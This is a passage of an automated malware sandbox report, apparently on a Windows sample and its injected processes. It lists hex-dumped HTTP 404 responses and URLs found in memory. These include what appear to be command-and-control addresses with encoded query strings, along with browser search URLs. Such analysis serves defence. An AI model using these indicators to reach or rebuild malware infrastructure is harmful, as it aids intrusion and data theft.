67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:23:01 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:23:03 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Jun 2024 08:23:06 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 10 Jun 2024 08:23:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 10 Jun 2024 08:23:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 10 Jun 2024 08:23:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 10 Jun 2024 08:23:48 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)
            Source: write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
            Source: write.exe, 00000015.00000002.4525142132.0000000006768000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003E68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/xu8t/?kH=00U8ENLHk&TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OMxSRG
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003E68000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/xu8t/?kH=00U8ENLHk&amp;TTv82Lg=oLDpCnbN5EMtVvNuEYw6gh378b687bJxPTnAScZXHKxhJk1OM
            Source: CFV20240600121.exe, BPSHhDGmARC.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: CFV20240600121.exe, 00000000.00000002.2093778209.00000000033F3000.00000004.00000800.00020000.00000000.sdmp, BPSHhDGmARC.exe, 0000000D.00000002.2305537186.00000000028EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: write.exe, 00000015.00000002.4525142132.0000000006444000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003B44000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4526253929.0000000004F53000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lunareafurniture.com
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4526253929.0000000004F53000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lunareafurniture.com/wzcd/
            Source: BPSHhDGmARC.exe.0.drString found in binary or memory: http://www.onelook.com/?w=
            Source: write.exe, 00000015.00000002.4525142132.0000000006C1E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000431E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.webuyfontana.com/
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/plugins/quiz-maker/public/css/quiz-maker-public.css?ver=6.3.3.0
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/plugins/themeisle-companion/obfx_modules/companion-legacy/asset
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.2
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.2
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/css/font-sizes.min.css?ver=3.0.21
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.21
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.21
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.4
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
            Source: write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.2
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://api.w.org/
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: write.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js
            Source: write.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
            Source: write.exe, 00000015.00000002.4525142132.00000000065D6000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003CD6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: write.exe, 00000015.00000002.4525142132.0000000005F8E000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.000000000368E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark
